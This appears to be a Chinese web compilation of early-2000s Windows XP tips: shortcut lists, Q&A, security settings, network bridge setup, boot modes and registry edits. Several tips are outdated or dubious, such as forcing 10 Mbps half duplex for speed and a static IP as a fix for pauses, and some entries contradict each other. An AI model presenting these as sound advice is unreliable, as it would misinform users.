    关于Windows XP下的显卡驱动问题

    Windows XP自带了FOR NVIDIA系列的显卡驱动程序一般没有问题，而目前的新版的雷管XP驱动在某些机器上安装后会出现问题，建议大家使用系统自带的驱动。NVIDIA目前正在修正雷管驱动。

    Windows XP 安装好后，如何把FAT 32转化为NTFS

    使用convert命令，在命令行模式下用convert.exe这个命令随时转化的。例如：
convert c: /fs:ntfs把c盘转化为NTFS.

    Windows XP下如何创建启动软盘

    插入软盘，然后在软盘驱动器的图标上点击右键，弹出菜单选择格式化，在格式化窗口里最下边选择创建MS-DOS启动盘即可。


Windows XP快捷键完美篇

《一键清理系统垃圾》

Windows XP快捷键完美篇

Windows XP快捷键完美篇

通用快捷键

F1
打开当前程序或者 Windows 的帮助内容

F2
重新命名选定的文件

F3
在桌面上的时候打开“查找文件”对话框

F5
刷新窗口的内容

F10或ALT
激活当前程序的菜单栏

DELETE
删除被选择的选择项目，如果是文件，将被放入回收站

SHIFT+DELETE
删除被选择的选择项目，如果是文件，将被直接删除而不是放入回收站

SHIFT+DELETE
剪切被选择的项目到剪贴板（在“桌面”，“我的电脑”，“资源管理器”外使用）

SHIFT
在放入 CD 的时候按下不放，可以跳过自动播放；

在打开 Word 的时候按下不放，可以跳过自启动的宏

CTRL+ALT+DELETE
打开 Windows 任务管理器

CTRL+SHIFT+ESC
打开 Windows 任务管理器

CTRL+F4
关闭当前应用程序中的当前文本（如 Excel 中）

CTRL+F6
切换到当前应用程序中的下一个文本（加SHIFT 可以跳到前一个窗口）

CTRL+A
选择所有项目

CTRL+N
新建一个新的文件

CTRL+O
打开“打开文件”对话框

CTRL+P
打开“打印”对话框

CTRL+S
保存当前操作的文件

CTRL+X
剪切被选择的项目到剪贴板

CTRL+Z
撤销上一步的操作

CTRL+C 或 CTRL+INSERT
复制被选择的项目到剪贴板

CTRL+V 或 SHIFT+INSERT
粘贴剪贴板中的内容到当前位置

ALT+连字符（—）
显示多文档界面程序的系统菜单 （如 Excel 中）

ALT+BACKSPACE
撤销上一步的操作

ALT+SHIFT+BACKSPACE
重做上一步被撤销的操作

ALT+F4
关闭当前应用程序

ALT+SPACEBAR
打开程序最左上角的菜单

ALT+TAB
在打开的项目之间切换

ALT+ESC
以项目打开的顺序循环切换

ALT+ENTER
将 Windows 下运行的命令行窗口在窗口和全屏幕状态间切换；

查看选定的文件的属性；选定任务栏时打开“任务栏和开始菜单”属性

ALT+双（单）击
查看选定的文件的属性

ALT+PRINT SCREEN
将当前活动程序窗口以图象方式拷贝到剪贴板

ALT+菜单名中带下划线的字母
显示相应的菜单

PRINT SCREEN
将当前屏幕以图象方式拷贝到剪贴板

APPLICATION（右击）
打开当前活动项目的快捷菜单

ESC
取消当前任务

WIN 或 CTRL+ESC
  打开开始菜单

WIN+D
显示桌面

WIN+M
最小化所有被打开的窗口

WIN+SHIFT+M
重新恢复上一项操作前窗口的大小和位置

WIN+E
  打开资源管理器

WIN+F
打开“查找文件”对话框

WIN+L
如果连接到网络域，则锁定您的计算机；如果没有连接到网络域，则切换用户

WIN+R
打开“运行”对话框

WIN+U
打开“辅助工具管理器”

WIN+BREAK
打开“系统属性”对话框

WIN+CTRL+F
打开“查找计算机”对话框

WIN+F1
打开 Windows 的“帮助和支持中心”

WIN+TAB
切换任务栏中运行的程序

“我的电脑”和“资源管理器” 快捷键

按住SHIFT再单击窗口的关闭按钮
关闭所选文件夹及其父文件夹（仅适用于“我的电脑”）

HOME
显示当前窗口的顶端

END
显示当前窗口的底端

BACKSPACE
查看上一级文件夹

左箭头
当前所选项处于展开状态时折叠该项，或选定其父文件夹

右箭头
当前所选项处于折叠状态时展开该项，或选定第一个子文件夹

ALT+左箭头
向后移动到上一个视图

ALT+右箭头
向前移动到上一个视图

NUM LOCK+减号（-）
折叠选定的文件夹

NUM LOCK+加号（+）
展开选定的文件夹

NUM LOCK+星号（*）
展开所选定的文件夹及其子文件夹

F4
显示“地址”栏列表

F6
  在左右窗格间切换

CTRL+G
转到

CTRL+拖动文件
复制文件

SHIFT+拖动文件
移动文件

CTRL+SHIFT+拖动文件
创建快捷方式

右键+拖动文件
移动（复制）文件；创建快捷方式到当前位置

SHIFT+双击
用资源管理器打开所选文件

IE　 快捷键

查看和浏览 Web 页

F1
显示 Internet Explorer 帮助，或显示对话框中某个项目的相关帮助信息

F11
在全屏幕和常规浏览器窗口之间进行切换

TAB
在 Web 页、地址栏和链接栏中向前移动到下一个项目

SHIFT+TAB
在 Web 页、地址栏和链接栏中向后返回到上一个项目

ALT+HOME
进入您的主页

ALT+右箭头
转到下一页

ALT+左箭头 或 BACKSPACE
返回前一页

SHIFT+F10
显示某个链接的快捷菜单

CTRL+TAB 或 F6
在不同框架之间向前移动

SHIFT+CTRL+TAB
在不同框架之间向后移动

上箭头
向文档起始处滚动

下箭头
向文档结尾处滚动

PAGE UP
向文档起始处翻页

PAGE DOWN
向文档结尾处翻页

HOME
移动到文档的开头

END
移动到文档的结尾

CTRL+F
在 Web 页中查找

F5 或 CTRL+R
仅当 Web 上的页面与本机存储的 Web 页时间戳不同时，才刷新当前 Web 页

CTRL+F5
即使 Web 上的页面与本机存储的 Web 页时间戳相同，仍然刷新当前 Web 页

ESC
停止下载 Web 页

CTRL+O 或 CTRL+L
转到新位置

CTRL+N
打开新窗口

CTRL+W
关闭当前窗口

CTRL+S
保存当前页

CTRL+P
打印当前页或当前框架

ENTER
激活选定的链接

CTRL+E
在浏览栏中打开搜索页

CTRL+I
在浏览栏中打开收藏夹

CTRL+H
在浏览栏中打开历史记录

使用地址栏

CTRL+单击
在历史记录或收藏栏上，打开多个文件夹

ALT+D
选择地址栏中的文字

F4
显示地址栏的历史记录

CTRL+左箭头
在地址栏中时，将光标左移到相邻的逻辑分隔符（. 或 /）

CTRL+右箭头
在地址栏中时，将光标右移到相邻的逻辑分隔符（. 或 /）

CTRL+ENTER
在地址栏中将“www.”添加到键入的文本的前面，将“.com”添加到文本的后面

上箭头
在“自动完成”建议项的列表中向前移动

下箭头
在“自动完成”建议项的列表中向后移动

使用收藏夹

CTRL+D
将当前 Web 页添加到收藏夹中

CTRL+B
打开“整理收藏夹”对话框

ALT+上箭头
在“整理收藏夹”对话框的“收藏夹”列表中向上移动所选项目

ALT+下箭头
在“整理收藏夹”对话框的“收藏夹”列表中向下移动所选项目

编辑

CTRL+X
删除所选项目并将其复制到剪贴板中

CTRL+C
将所选项目复制到剪贴板

CTRL+V
将剪贴板中的内容插入到所选位置

CTRL+A
选中当前 Web 页中的所有项目

对话框　快捷键

F4
在“另存为”或“打开”对话框中打开“保存到”或“查阅”

CTRL+TAB
在选项卡之间向前移动。

CTRL+SHIFT+TAB
在选项卡之间向后移动。

TAB
在选项之间向前移动。

SHIFT+TAB
在选项之间向后移动。

ALT+带下划线的字母
执行相应的命令或选中相应的选项。

ENTER
执行活选项动或按钮所对应的命令。

SPACEBAR
如果活选项动是复选框，则选中或清除该复选框。

箭头键
活选项动是一组选项按钮时，请选中某个按钮。

BACKSPACE
如果在“另存为”或“打开”对话框中选中了某个文件夹，则打开上一级文件夹

放大程序　快捷键

WIN+PRINT SCREEN
将屏幕复制到剪贴板（包括鼠标光标）

WIN+SCROLL LOCK
将屏幕复制到剪贴板（不包括鼠标光标）

WIN+ PAGE UP
切换反色

WIN+PAGE DOWN
切换跟随鼠标光标

WIN+上箭头
增加放大率

WIN+下箭头
减小放大率

辅助选项　快捷键

右侧 SHIFT 键八秒钟
切换“筛选键”的开和关

左边ALT+左边SHIFT+PRINT SCREEN
切换“高对比度”的开和关

左边ALT+左边SHIFT+NUM LOCK
切换“鼠标键”的开和关

SHIFT 键五次
切换“粘滞键”的开和关

NUM LOCK键五秒钟
切换“切换键”的开和关

WIN+U
打开“工具管理器”

注：如果在“辅助功能选项”中打开“粘滞键”，则有些快捷键可能不起作用


Windows XP深入问答

《一键清理系统垃圾》

Windows XP深入问答

2002-03-09　　　 作者：小滔

    1、我使用Windows XP系统，请问使用什么方法可以提高启动速度？

    使用微软提供的“Bootvis”软件可以有效的提高Windows XP启动速度。这个工具是微软内部提供的，专门用于提升Windows XP启动速度。下载后解压缩到一个文件夹下，并在“Options”项中设置使用当前路径。之后从“Trace”项下拉菜单中选择跟踪方式。该程序会引导Windows XP重新启动，并记录启动进程，生成相关的BIN文件。之后从Bootvis中调用这个文件，从Trace项下拉菜单中选择“Optimize system”命令即可。

    2、我使用Windows XP时发现，随着不断地增加、删除应用程序，磁盘可用空间不断减少，这是为什么？

    从Windows 2000开始，Windows会在每个硬盘分区中建立一个“System Volume Information”文件夹，在该文件夹中提供的是系统默认保存的系统还原备份文件。不过Windows 2000还没有正式提供系统还原功能，在XP中，你可以看到相关的选项。为防止这个问题发生，最简单的方法就是关闭“系统还原”功能。如果要删除这个文件夹中保存的文件，你需要以Administrator（管理员）身份登录系统。

    3、如何提高Windows XP的运行速度？

    Windows XP虽然提供了一个非常好的界面外观，但是不可否认这样的设置也在极大程度上影响了系统的运行速度。如果你的机器运行起来速度不是很快，建议将所有的附加桌面设置取消，也就是将Windows XP的桌面恢复到Windows 2000样式。设置的方法非常简单，在“我的电脑”上单击鼠标右键，选择“属性”，在“高级”选项卡中单击“性能”项中的“设置”按钮，在关联界面中选择“调整为最佳性能”复选框即可。此外，一个对Windows XP影响重大的硬件就是内存。使用256MB内存运行Windows XP会比较流畅，512MB的内存可以让系统运行得很好。

4、我在Windows XP中设置了用户存取磁盘权限，但是后来由于不慎将用户删除，现在不能查看被加密的磁盘和文件了，怎么办？BTW：使用PQ不能将该分区转换为FAT32分区。

    Windows XP具有更高的安全性能，如果设置用户的时候使用了权限保护功能，其他用户是不能直接访问你的文件夹的，即使是系统管理员。这样虽然安全，但是出了问题也是非常头痛的事情。如果你正好遇到这样的问题，必须以Administrator身份登录，然后在文件夹选项中的“View（查看）”选项卡中的“Advanced Settings（高级设置）”列表窗口中关闭“Use simple file sharing（使用简单文件共享）”复选框。之后返回相应的文件夹或者磁盘分区，在关联的菜单中选择“Properties（属性）”命令，切换到“Security（安全）”选项卡，此时可以看到其中没有允许访问的任何用户，单击“Advanced（高级）”按钮，进入高级设置界面。切换到“Owner（所有者）”选项卡，在其中如果有你的用户列表，选择它，并选择界面下边的 “Replace owner on subcontainers and objects（替换子容器及对象的所有者）”复选框，单击“Apply（应用）”添加设置，此时你可以看到在“Permissions（权限）”选项卡中看到你的名字了。当然，如果在“Permissions（权限）”选项卡中允许你添加新的访问用户，则可以忽略上面的操作。单击“OK（确定）”按钮返回，现在就可以访问原来加密的文件夹，或者磁盘了。此外，如果你在“Pemissions”选项卡中看到了一个很长的“S-1-5-21-xxxxx”等全部是数字组成的用户，这可能就是以前创建的用户名，但是它已经损坏了，选择该用户，清除界面中的“Inherit from part the permission entries that apply to child objects. Inculde these with entries explicitly defined here（从父项继承那些可以应用到子对象的权限项目，包括那些在此明确定义的项目）”复选框。在关联的界面中选择“Copy（复制）”命令，之后可以将这个无用的用户删除。

    5、我安装了Windows XP，在“添加/删除程序”里没找到制作启动盘的程序，我该怎么办？

    在Windows XP中并没有自带制作启动盘的程序，需要使用其他工具才能实现，你可以在以下地址下载到相应版本的制作工具。

    家庭版本 http://go1.163.com/xiaolh/winxp3/20020117/20020117A.htm

    高级版本 http://go1.163.com/xiaolh/winxp3/20020117/20020117B.htm

    在使用中需要注意的是，此程序做的启动盘只能供Windows XP使用，并且要使用此程序你需准备6张格式化的空白1.44MB高密度软盘，其中第一号盘就可以用来启动计算机。


Windows XP网络及文件安全技巧总结

《一键清理系统垃圾》

Windows XP网络及文件安全技巧总结

    您的计算机是否与人共享？如果是，那么您一定会担心您的个人文件的安全问题，如果您在使用Windows XP操作系统的话，那么您就能使用Windows XP所提供的一些简单而高效的设置来维护您的文件安全。
    1、如何让XP自动连网 　　IE—— 工具——internet选项——连接，勾选 "网路不存在时拨号" ，把 IE 拉到 "启动"　每次开机完成后， 你已经上线了 ! 还有一种方法：进入连线内容，把“提示名称、密码、凭证等”的勾勾取消掉，然後把该连线拉到“启动”。
    2、快速浏览局域网络的共享 　　通常情况下，Windows XP在连接其他计算机时，会全面检查对方机子上所有预定的任务，这个检查会让你等上30秒钟或更多时间。去掉的方法从注册表中找到“HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionExplorerRemoteComputerNameSpace”。 　　在此键值下，会有个{D6277990-4C6A-11CF-8D87-00AA0060F5BF}键，把它删掉后，重新启动计算机，Windows XP就不再检查预定任务了，速度将明显提高。
    3、加密文件与文件夹 　　加密文件与文件夹可以使未经授权的用户无法读取该文件与文件夹。在Windows中加密文件或文件夹的方法是：打开“Windows资源管理器”，右键单击想要加密的文件或文件夹，选择“属性”选项，单击“常规”选项卡中的“高级”按钮，选中“加密内容以便保护数据”复选框即可(这种操作仅适用于NTFS文件系统)。
    在加密文件夹时，系统将询问是否要同时加密文件夹内的所有文件和子文件夹，如果选择这么做，那么文件夹内当前的和将来要添加的所有文件或子文件夹都将被加密；如果选择仅加密文件夹，则文件夹中当前所的文件和子文件夹将不被加密，但以后任何被加入该文件夹的文件和子文件夹在加入时均将被加密。对单个文件进行加密时，系统也将询问是否要同时加密包含它的文件夹，如果选择这么做，则以后所有被添加进该文件夹中的文件和子文件夹都将被自动加密。
    4、提高10/100M网卡传输速率
    选择“开始→连接到→显示所有连接”，双击网卡所用的连接，单击“属性”按钮，打开“属性”对话框，选择“高级”选项卡。在“属性”栏中选择“Link Speed/Duplex Mode”，紧接着在“设置值”栏中将“Auto Mode”更改为“10 Half Mode”。 　　这样，手工将10/100M自适应网卡的属性强制为10M半双工模式，使网卡之间不进行自动协商，让网卡之间在传输数据时始终以10Mbps的速度进行，大大提高了网络之间的传输效率。此设置只对部分网卡有效。
    5、共享驱动器或文件夹的设置 　　使用Windows XP可以很方便地将驱动器或文件夹设置成“共享”，而且，若不想让这些共享的驱动器或文件夹被远程计算机用户看到的话，只需在共享驱动器或文件夹的“共享名”后面加上一个“$”就行了，如“C$”。然而，当远程计算机用户知道了该机的计算机名以及管理员、服务器操作员的用户名和密码后，那么任何远程计算机用户都能通过局域网络或Internet访问该计算机，无疑，这也使具有共享驱动器或文件夹的计算机存在着安全隐患。为保障共享驱动器或文件夹的安全，我们应该禁用服务器服务。禁用服务器服务后，所有远程计算机都将无法连接到该计算机上的任意驱动器或文件夹，但本机的管理员仍然能够访问其他计算机上的共享文件夹。禁用服务器服务的操作方法是：依次进入“控制面板”——“性能和维护”——“管理工具”，双击“服务”图标，在“服务”窗口中双击“Server”项，可看到如图1所示的对话框，在“启动类型”列表中选择“已禁用”或“手动”项即可。
    6、解决WinXP执行时候停顿一下的问题 　　开始——网络连接——本地连接，按右键，选择属性，选择“Internet协议(TCP/IP)”，点击属性，使用下面的IP地址：192.168.0.1，子网掩码：255.255.255.0，这样就好了，以後开机就不会停顿了。
    7、将文件夹设为专用文件夹 　　在默认情况下，Windows XP中所有的文件夹都是开放的，即该机上的全部用户都可使用它们，这无疑使某些用户的重要个人资料面临着严重的威胁。为此，Windows XP新增了一项叫“文件夹专用”的功能，它是指在NTFS文件系统中，某个文件夹被用户设置成“专用文件夹”后，该文件夹就只能由该用户使用，而其他用户在登录Windows XP后是无法使用的，这就为保护个人重要资料提供了方便。要使某个文件夹专人专用，只需将该文件夹移动到“x:\Documents and Settings\用户名\”文件夹中(x是指Windows XP安装文件所在分区)，然后右击该文件夹，选择“属性”选项，在“共享”选项卡中勾选“将这个文件夹设为个人的，这样只有我才能访问”复选框。这样，当其他用户登录Windows XP后想进入这个文件夹时将遭到“拒绝访问”的警告提示。
    8、加速共享 　　这是一项很棒的优化，在找到这项优化之前，我经常在漫长地等待窗口显示其它机子上的共享目录中敲破头皮。 　　通常情况下，当Windows XP连接到其它计算机时，会检查对方机子上所有预定的任务——这真是多余，而且还会让你等上30秒钟，实在太糟糕了。 　　所幸的是，很容易就可以把这个过程给禁掉。首先，在注册表中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows/Current Version\Explorer\RemoteComputer\NameSpace。在这里面，应该有个{D6277990-4C6A-11CF-87-00AA0060F5BF}键。只需把它删掉，重新启动计算机后，Windows就不再检查预定任务了，速度明显提高！


Windows XP网桥功能初探

《一键清理系统垃圾》

Windows XP网桥功能初探

2002-03-09 作者：凌巍

    如今，在Windows XP中，已经集成了连接不同网段的“网桥（Bridge）”功能，它的配置简单易行，大大方便了中小型局域网之间的互联与拓展。

    在配置Windows XP 的网络组件时要注意以下几点：

    1、配置Windows XP的网桥服务器不要配制成域控制器，只需配置成为独立的服务器即可。

    2、安装的两块网卡均要保证工作正常，检验方法为：打开“控制面板→系统”，找到“硬件”选项卡，点击“设备管理器”，展开“网络适配器”，看到两块网卡的图标之前没有黄色惊叹号，“设备状态”为“工作正常”即可。

    3、Windows XP网桥所支持的网络通信协议是TCP/IP，只能在以TCP/IP协议通讯的网络中转发数据包。但是，网络中的主机操作系统却不一定要是Windows系列，如果是Linux或其他的操作系统，只要是正确装载了TCP/IP协议，Windows XP网桥一样可以与其协同工作。

    下面，我们开始一步步配置Windows XP网桥。

    第一步：给网桥中的两个不同网段接口分配不同的IP地址。我们要互联的两个网段一个是10.0.0.0，在网桥中我们可任选一块网卡，给它分配固定的IP地址10.0.0.1，作为10.0.0.0的网络接口。具体方法为：打开“控制面板”，选“网络”，选中“本地连接”（第一块网卡）的“属性”，打开“TCP/IP”，选中“指定IP地址”，填入10.0.0.1，子网掩码为255.0.0.0，网关为10.0.0.1即可。

    同理，我们可以给“本地连接2”（第二块网卡）指定IP地址为192.168.0.1，子网掩码为255.255.255.0，网关为192.168.0.1。

    第二步：启动Windows XP网桥。在“本地连接”（第一块网卡）上单击鼠标右键，找到“新建网桥（Create Bridge）”，点击之后，Windows XP即会出现一个“网桥（Network Bridge）的图标。但由于此时只有一个网络接口存在于网桥中，因此网桥还暂时不能工作（网桥图标上有红叉）。我们在“本地连接2”（第二块网卡）上同样执行一次“新建网桥（Create Bridge）”的操作之后，可以看到网桥的图标已发生了改变。在网桥图标上单击鼠标右键，选择“属性”，可以检查刚刚加入的这个网络接口的各项属性，如网卡名称，各自绑定的IP地址等。

    第三步：网桥启动之后，将10.0.0.0网段内的主机网关一律设为10.0.0.1，将192.168.0.0 网段内的主机网关一律设为192.168.0.1。我们在10.0.0.0的网段内任选一台电脑，如10.0.0.2，在命令行内键入“ping 192.168.0.2”，如能收到“Reply from 192.168.0.2……”的回应，即可说明网桥工作正常，两网段已经连通并可互传文件。

    笔者还要补充两点：

    1、Windows XP网桥不只局限于连接两个网段，它可以连接多个网段，将网段的接口按照上面所说的方法依次加入即可。

    2、Windows XP网桥只能采取手动指定网络路径的方式，因此效率不会很高，在大型的局域网中，所需转发的数据包流量很大时，它的作用比不上专用的路由器。


Windows XP系统八种启动模式详解

《一键清理系统垃圾》

Windows XP系统八种启动模式详解

  在系统启动Windows XP时按F8键，屏幕上就会显示Windows XP启动的高级选项菜单，通过这些选项可选择不同的模式启动Windows XP。下面将这些选项的含义介绍给大家。
    1．安全模式：选用安全模式启动Windows XP时，系统只调用一些最基本的文件和驱动程序，只使用少量设备，且不加载启动组中的任何内容；启动后不能与网络接通，许多设备也不能正常使用（Windows XP的安全模式下可以使用光驱）。这种模式有助于诊断系统产生的问题所在，如果新添加的设备或对驱动程序进行更改后系统有问题就可以进入安全模式，将出现问题的设备删除，然后再安装。如果安全模式下不能解决问题，则多半需要重新使用安装光盘来修复系统。
    2．带网络连接的安全模式：这种模式使用基本文件和驱动程序，与“安全模式”相比，它还要加载网络驱动程序，它的主要作用与安全模式基本相同，但是它不支持用PCMCIA卡（一种遵循个人计算机内存卡国际协会规范的可移动插卡）联网。如果计算机已经接入网络，且用安全模式启动时没有检测到任何错误，则可能是网卡出错，用此模式可以发现一些在安全模式下隐藏的问题。
    3．命令行提示符的安全模式：使用基本的文件和驱动程序启动Windows ，启动后进入命令提示窗口。注意该模式下将不会出现桌面和开始菜单，如果不小心关闭了该DOS窗口，则关机只能通过按“Ctrl+Alt+DEL”来打开“Windows 任务管理器”，然后从它的“关机”菜单下选择；或者在任务管理器中加载新任务explorer．exe可以出现桌面和开始菜单，然后可以像正常模式一样关机。
    4．启用启动日志：引导Windows 并将系统正常加载和没有正常加载的程序记录到文件中（文件的名称是ntbtlog.txt，位于Windows XP的安装目录winnt下），通过这个日志文件可以分析系统启动时出现问题的根本原因。
    5．启用VGA模式：使用标准VGA驱动程序来引导Windows ，如果在安装了新的显示驱动程序后导致Windows 出现错误，则可以进入该模式，然后将错误的驱动程序删除后再安装其它驱动程序。该模式常用于解决因显卡驱动错误造成系统启动异常的问题。
    实际上，在“安全模式”、“网络安全模式”、“命令提示符安全模式”下都使用标准VGA驱动程序。
    6．最后一次正确的配置：系统出现问题后（比如新添的驱动程序与硬件不一致可能导致系统无法正常启动），
    使用“最后一次正确的配置”来启动Windows 一般都可以解决这些问题。当然，如果因为系统文件丢失或损坏而出现的系统问题，它是不能解决的（这种情况可以进入系统配置实用程序后点击“展开文件”提取相应文件来恢复）。
    7．目录服务恢复模式：该模式是用于还原域控制器上的Sysvol目录和Active Directory（活动目录）服务的。
    它实际上也是安全模式的一种。
    8．调试模式：如果某些硬件使用了实模式驱动程序（如在config.sys和autoexec.bat中加载的某些驱动程序）并导致系统不能正常启动，就可以用调试模式来检查实模式驱动程序产生的冲突。在该模式下系统会反复测试并确定要使用或取消config.sys或autoexec.bat中的驱动程序，以便发现引起系统配置问题的设备驱动程序。


Windows XP系统在老款机器上升级

《一键清理系统垃圾》

Windows XP系统在老款机器上升级

    问题背景：同事一台老机尝试升级Win XP系统，安装过程中出现黑屏死机导致升级失败。

    分析解决：朋友的老机安装过Win98/Me/2000，系统均能正常运行，硬件应该没有问题。但是考虑到Win XP系统对硬件的要求较为苛刻，首先查看了一下老机的配置：2000年购入的SiS530整合声卡显卡的主板、AMD K6-2 500MHz CPU、2条PC-100 128MB内存、ST 10GB硬盘。按照微软官方公布的安装Win XP系统的最低硬件配置，本机硬件基本符合要求。于是重新分区、格式化后，拿出Win XP的安装盘开始安装。两次重启后很顺利地完成系统文件的拷贝。然而在最后一次重启时，系统在运行到启动画面后就死机了。至此，系统升级失败。换用另外的Win XP安装盘，故障依旧。把安装光盘的内容拷入硬盘，执行硬盘安装程序，还是没有成功。同事原来配置为单条128MB内存，后为提高运行速度又加装了同品牌128MB内存一条。是不是这个后来加装的内存惹的祸呢？拔下新的内存条，经试验结果未变。尝试升级主板的驱动后，依旧没有解决问题。

    升级陷入了僵局。后经朋友指点：安装Win XP时需要更高的系统配置，同时它不兼容一些老的硬件和软件。如果老机升级Win XP不能成功，可尝试刷新主板BIOS以获得更好的硬件支持和兼容性。我如同捞到了一根救命的稻草，马上在网上下载了最新的主板BIOS文件。刷入新的BIOS程序，重新安装Win XP，故障解决。

    总结：老机升级Win XP系统往往坎坷颇多。主板BIOS作为最基本的输入输出系统是硬件最底层的软件，如果你的老机在升级系统时遇到上述故障，不妨尝试刷新主板BIOS程序，从而获得对更多新的硬件或软件的支持。


Windows XP应用技巧

《一键清理系统垃圾》

Windows XP应用技巧

Windows XP系统会出现关机等待时间太长，磁盘占用高，某些操作没有Windows 98快速等问题。本文从细处着手，详细的讲述了Windows XP系统的一些使用技巧，希望对大家提高应用技能有所帮助。本期我们上的是第一部份。
    1、卸载无用的动态链接
    “资源管理器”经常会在内存中留下无用的动态链接，为了清除这种现象，我们在注册表编辑器中设置键值：HKEY_LOCAL_MACHINE\SOFTWARE \Microsoft\Windows\CurrentVersion\EXPlorer\AlwaysUnloadDLL=DWORD: 1将其设为0，这一功能就会被关闭。重新启动计算机，你的设置就开始生效了。
    2、减少启动时间的另一种方法
    Windows XP使用预读设置这一新技术，以提高系统速度。如果你拥有512M内存以上，你可以进行以下修改：
    （1）运行“regedit”
    （2）去[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher>;
    （3）设置数值0，1，2，3。0-Disable,1-预读应用程序,2-启动预读,3-前两者皆预读 ("3"，推荐使用)。
    （4）重启，这样可以减少启动时间。
    3、将所喜爱的程序放置在开始菜单顶部附近
    你是否对某个程序非常喜爱且经常使用呢？那么，应通过将其放置在列表顶部的方式提高它在开始菜单中的优先级。这种方式能够确保该程序保持在开始菜单中，且不受其它程序的干扰，即便其它程序具有更高的使用频率也是如此。在开始菜单上右键单击指向你所喜爱程序的链接，并在随后出现的快捷菜单中选择“附到‘开始’菜单”上。你的程序将被永久移动到列表顶部，仅仅位于浏览器与电子邮件程序下方。
    4、更改文件日期
    要修改***.exe的日期，可以在MS-DOS方式下键入copy XXX.exe+,,(注：加号后紧跟2个逗号)，系统询问时键入“Y”即更改为当前日期。
    5、临时为自己分配管理权限
    许多程序在安装过程中都要求你具备管理权限。这里介绍了一种以普通用户身份登录的情况下，临时为自己分配管理权限的简单方法。在右键单击程序安装文件的同时按住“Shift”键。在随后出现的快捷菜单中点击“运行方式”，输入具有相应管理权限的用户名和密码。这种方式对于开始菜单上的应用程序同样适用。
    6、利用回收站给文件夹加密
    单击“我的电脑→查看→文件夹选项”，选中“显示所有文件”，单“确定”；进入系统根目录，右击“回收站”，(即“Recycled”文件夹)，在弹出的快捷菜单对话框中选中“启用缩略图查看方式”，然后点击“应用”，你会发现，系统自动将“只读”属性选中了，你需要手动除去“只读”属性，然后单击“确定”。这时你会发现图标变成了一个普通文件夹的样子，这时再双击“Recycled”文件夹，找到一个名为“desktop.ini”的初始化文件，并激活它，复制到你需要加密的文件下，如“d:\MyFiles”文件夹下面；然后右击“d:\MyFiles”文件夹，选择属性，在弹出的对话框中确保“只读”属性被选中，然后在“启用缩略图查看方式”复选框前打上钩，然后确定即可。
    7、为Capslock增加响铃
    输入中文时不慎按动Capslock会变为大写英文，给此键加个“响铃”就放心多了。方法是：打开“控制面板”的“辅助选项”，在“键盘”项中，选择“使用切换键”。
    8、拒绝分组相似任务栏
    虽然Windows XP “分组相似任务栏按钮”设置虽然可以让你的任务栏少开窗口，保持干净，但对于一些需要打开同类多个窗口的工作非常不便。如你是经常用QQ这样的通讯软件和人在线聊天的话，如果有两个以上的好友同时和你交谈，你马上会感到XP这种默认设置造成的不便――每次你想切换交谈对象的时候，要先点击组，然后弹出的菜单里再选要交谈的好友，而且每个好友在组里显示的都是一样的图标，谈话对象多的时候，你可能要一个个的点击来看到底刚才是谁回复了话，在等着你反应，而且选错了一个，又得从组开始选，很麻烦。显然地，这样不如原来的开出几个窗口，在任务栏里的各个小窗口点击一次就可进行开始聊天。更改方法：点击“开始→控制面板→外观和主题→任务栏和‘开始’菜单”，在弹出的窗口内，将“分组相似任务栏按钮”选项前面的钩去掉。
    9、清除预读文件
    当XP使用一段时间后，预读文件夹里的文件会变得很大，里面会有死链文件，这会减慢系统时间。建议：定期删除这些文件。(Windows\prefetch)
    10、XP选程桌面漏洞解决办法
    Windows XP提供了远程桌面功能，目前被证实存在设计缺陷，可能导致攻击者得到系统远程桌面的账户信息，有助于其进一步攻击。当连接建立的时候，用Windows XP远程桌面把账户名以明文发送给连接它的客户端。发送的账户名不一定是远端主机的用户账号，而是最常被客户端使用的账户名，网络上的嗅探程序可能会捕获到这些账户信息。
    解决方法：到微软主页下载相应的补丁程序，并暂时停止远程桌面的使用，方法是：右键单击“我的电脑”，选择“属性”，在弹出的窗口中，选“远程”标签，勾掉“允许用户远程连接到这台计算机”复选框前的钩，点“确定”即可。
    1、自动关闭停止响应程序

    在[开始]-->[运行]-->键入[Regedit]-->[HKEY_CURRENT_USER]-->[Control Panel]-->[Desktop]，将字符串值[AutoEndTasks]的数值数据更改为1，重新启动即可。

    2、加快窗口显示速度

    我们可以通过修改注册表来改变窗口从任务栏弹出，以及最小化回归任务栏的动作，步骤如下：打开注册表编辑器，找到HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics子键分支，在右边的窗口中找到MinAniMate键值，其类型为REG_SZ，默认情况下此健值的值为1，表示打开窗口显示的动画，把它改为0，则禁止动画的显示，接下来从开始菜单中选择“注销”命令，激活刚才所作的修改即可。

    3、修改Windows XP的登录背景图案

    面对长久不变的单调的登录图案，你可能日久生厌，我们可以通过注册表来把它换成自己喜欢的图案，步骤如下：打开注册表编辑器，找到HKEY_USERS\.DEFAULT\Control Panel\Desktop子键分支，双击wallpaper，键入你选择好的图片的路径，如：c:\Documents and Settings\My Documents\My Pictures\mypic.bmp，点击“确定”，然后找到Tilewallpaper，双击它输入键值“1”，重新启动系统即可看到效果。

   4、每次启动时保持桌面设置不变

    我们可以通过修改注册表来保护我们的桌面设置，无论做了什么样的修改，只要重新启动之后桌面就会恢复原样。步骤如下：打开注册表编辑器，找到HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion\Polices\Explorer子键分支，在它的下面找到NoSaveSettings，其类型为REG_SZ，将其键值改为“0”，或者直接删除该键值项，重新启动系统使设置生效。

    5、让Windows XP和Win98共享IE收藏夹

    大家知道，如果安装Windows XP和Win98双系统，那么两个系统应该在不同的硬盘分区上。要想实现Windows XP和Win98 共享IE 收藏夹，就应当将两个系统的IE收藏夹设置在非系统分区的其他的硬盘分区。如果Windows XP安装于C 盘，Win98安装于D 盘， 共享IE 收藏夹就可以设置在 E 盘如E :\Favorites。可以通过分别修改Windows XP和Win98注册表来实现Windows XP和Win98 共享IE 收藏夹。

    找到HKEY_CURRENT_USER\Software\Microsoft\Windows\VurrentVersion\Explorer\ShellFolders，在右面的窗口找到“Favorites”。双击以后将其内容修改为 E:\Favorites，这样就可以实现Windows XP和Win98 共享IE收藏夹了。

    6、让Windows XP在发生严重错误时自动重新启动

